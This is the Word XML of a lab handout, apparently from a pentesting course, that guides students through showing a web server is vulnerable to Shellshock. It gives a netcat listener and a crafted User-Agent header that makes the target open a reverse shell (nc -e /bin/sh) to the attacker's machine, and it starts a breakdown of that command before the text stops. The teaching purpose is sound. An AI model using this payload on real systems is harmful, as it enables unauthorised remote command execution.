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B50AA6" w14:textId="77651DD7" w:rsidR="00BB3A74" w:rsidRDefault="00CE294B" w:rsidP="00BB3A74">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>Part 2: Advanced Pentesting (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDFD6AF" w14:textId="77777777" w:rsidR="00E474A1" w:rsidRPr="00E474A1" w:rsidRDefault="00E474A1" w:rsidP="00E474A1"/>
    <w:p w14:paraId="43666117" w14:textId="3854972F" w:rsidR="00BB3A74" w:rsidRPr="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The developer has rejected your vulnerability report.  He says that his CISSP certification means that it is impossible for him to write vulnerable code.  The Chief Technology Officer isn’t so sure that the developer is right, but you’ve only been around for a couple of hours, so he doesn’t know who to trust.  He’s asked you to prove that the server is vulnerable- but don’t crash the server!  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A78094" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Activity: Demonstrate that the server is vulnerable to Shellshock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FC83B6" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27559DB5" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Shellshock allows us to run commands on the target server.  Since it’s a web server, we can use the CGI on the server to make modifications on the target server.  Let’s make a small change to the web page so that it shows your name and also has a picture of our choice included in the page.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8FF243" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F4DAF16" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>We’re going to run a quick web server that hosts our image.  We’ll then use the shellshock vulnerability to modify one line of HTML on the web server to point to our image, plus add our signature on the page so that the developer can see that the server is vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0242A20F" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="514FBC5D" w14:textId="0ADC4BFA" w:rsidR="00BB3A74" w:rsidRPr="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Launch a NC listener</w:t>
      </w:r>
      <w:r w:rsidR="00384C61">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> so that we can catch a shell from the target server</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFA2E59" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72BD9FC9" w14:textId="117C7243" w:rsidR="00BB3A74" w:rsidRPr="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Netcat is called the TCP/IP Swiss Army Knife.  It’s a powerful tool we can use for networking.</w:t>
      </w:r>
      <w:r w:rsidR="001420A8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">We’re going to use Netcat to “catch” a shell from the server.  We’ll use the shellshock vulnerability to tell the server to connect back to our pentesting workstation, and then we’ll be able to see the results of commands we send at the server.   So to start, we need to prepare what is essentially a baseball glove.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The server’s going to throw a ball back at us</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>we want to catch it</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.  Let’s prepare our glove:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA7E704" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17566E2E" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Open a terminal window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CD9993" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Launch a NC listener on your testing machine: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F898575" w14:textId="208BFA27" w:rsidR="00BB3A74" w:rsidRPr="00384C61" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nc -l -p 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35085F4C" w14:textId="342E4AE0" w:rsidR="00384C61" w:rsidRPr="00384C61" w:rsidRDefault="00384C61" w:rsidP="00384C61">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>When you run the command above, there should be no response.  It might look like it is hanging.  It is not.  Proceed to the next step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D17FF2" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F3C0438" w14:textId="77777777" w:rsidR="00E474A1" w:rsidRDefault="00E474A1" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C7A8993" w14:textId="77777777" w:rsidR="00E474A1" w:rsidRDefault="00E474A1" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53FC8CD7" w14:textId="77777777" w:rsidR="00E474A1" w:rsidRDefault="00E474A1" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6526215B" w14:textId="056969BC" w:rsidR="00BB3A74" w:rsidRPr="00BB3A74" w:rsidRDefault="00384C61" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: </w:t>
      </w:r>
      <w:r w:rsidR="00BB3A74" w:rsidRPr="00384C61">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Let’s t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">rick the server into sending a shell </w:t>
      </w:r>
      <w:r w:rsidR="00BB3A74" w:rsidRPr="00384C61">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>to us</w:t>
      </w:r>
      <w:r w:rsidR="00BB3A74" w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DA93FA" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="166B9139" w14:textId="27D4E1FC" w:rsidR="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Open up a second terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571155CA" w14:textId="04354BD2" w:rsidR="00384C61" w:rsidRDefault="00384C61" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>Hacking can be a little like magic in Harry Potter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAA5F74" w14:textId="221CA668" w:rsidR="00384C61" w:rsidRDefault="00384C61" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40289F46" w14:textId="6EE9239A" w:rsidR="00384C61" w:rsidRPr="00BB3A74" w:rsidRDefault="00384C61" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">We don’t need to know all of the details of why magic works in Harry Potter- we just need to know that if we say “expecto patronum”, your patronous will appear.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B917F7E" w14:textId="0107AC95" w:rsidR="00384C61" w:rsidRDefault="00384C61" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E747752" w14:textId="6941BF6E" w:rsidR="00384C61" w:rsidRDefault="00384C61" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">In the same way, with hacking, we sometimes have to run a combination of special commands with various flags that are complex.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>You don’t have to know all of the details of how it works- only that it does work.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  As you get more familiar with commands and attacks, you may want to come back and read the detailed summary of how the attack works.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A59BC8D" w14:textId="77777777" w:rsidR="00384C61" w:rsidRPr="00384C61" w:rsidRDefault="00384C61" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37AF026A" w14:textId="79518B53" w:rsidR="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">We’re going to execute </w:t>
      </w:r>
      <w:r w:rsidR="002035B0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a complicated series of commands that we’ll dive into below</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A26C61">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  It’s easy to make typos, so I</w:t>
      </w:r>
      <w:r w:rsidR="002035B0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> created a </w:t>
      </w:r>
      <w:r w:rsidR="00384C61">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">small </w:t>
      </w:r>
      <w:r w:rsidR="002035B0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>script that you can execute which takes care of the typing for you.  You can easily start the test by typing the following</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E383141" w14:textId="77777777" w:rsidR="001420A8" w:rsidRPr="00BB3A74" w:rsidRDefault="001420A8" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FFC6AA8" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="001420A8" w:rsidRDefault="00BB3A74" w:rsidP="001420A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001420A8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>./trickserver.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21949A2E" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CEBA6CF" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>trickserver.sh launches the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576B33B5" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRPr="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46AB7ECB" w14:textId="6055B04E" w:rsidR="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{ :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;}; /usr/bin/nc </w:t>
      </w:r>
      <w:r w:rsidR="002035B0" w:rsidRPr="002035B0">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>192.168.64.210</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.64.201 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525986B0" w14:textId="4F90EC6C" w:rsidR="00384C61" w:rsidRDefault="00384C61" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05CAC6F3" w14:textId="59747814" w:rsidR="00384C61" w:rsidRPr="00384C61" w:rsidRDefault="00384C61" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:r w:rsidR="00BB4695">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">command </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>is our magic hacking spell.  If you want to understand what is happening</w:t>
      </w:r>
      <w:r w:rsidR="00BB4695">
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, continue reading.    Most students should just skip to step 4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2C1BFF" w14:textId="749A7643" w:rsidR="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64B7DB6E" w14:textId="77777777" w:rsidR="00384C61" w:rsidRPr="00BB3A74" w:rsidRDefault="00384C61" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37E2E2D5" w14:textId="77777777" w:rsidR="00384C61" w:rsidRDefault="00384C61">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1883F55A" w14:textId="19683BBD" w:rsidR="00384C61" w:rsidRDefault="00384C61" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00384C61">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Detailed Discussion of the attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC8846C" w14:textId="77777777" w:rsidR="00384C61" w:rsidRPr="00384C61" w:rsidRDefault="00384C61" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="033ACED8" w14:textId="0FF3D6CB" w:rsidR="00BB3A74" w:rsidRPr="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB3A74">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The line above contains 5 commands that are chained together to obtain shell access on the server.  Let’s break down this command into its parts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021DF9B5" w14:textId="77777777" w:rsidR="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00BB3A74"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BB3A74" w14:paraId="724B72F7" w14:textId="77777777" w:rsidTr="00845FE2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="530141F0" w14:textId="2AD83046" w:rsidR="00BB3A74" w:rsidRDefault="00BB3A74" w:rsidP="00845FE2">
            <w:r w:rsidRPr="00AC0834">
              <w:rPr>
                <w:b/>
                <w:iCs/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>echo -e</w:t>
            </w:r>
            <w:r w:rsidRPr="00AC0834">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/</w:t>
            </w:r>
            <w:r w:rsidRPr="002035B0">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:t>nc </w:t>
            </w:r>
            <w:r w:rsidR="002035B0">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>192.168.64.</w:t>
            </w:r>
            <w:r w:rsidR="002035B0" w:rsidRPr="002035B0">
              <w:rPr>
                <w:bCs/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">10 </w:t>
            </w:r>
            <w:r w:rsidRPr="00AC0834">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:t>443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: c</w:t>
            </w:r>
            <w:r w:rsidR="002035B0">
              <w:rPr>
                <w:iCs/>
              </w:rPr>
              <w:t>lose\r\n\r\n" | nc 192.168.64.2</w:t>
            </w:r>
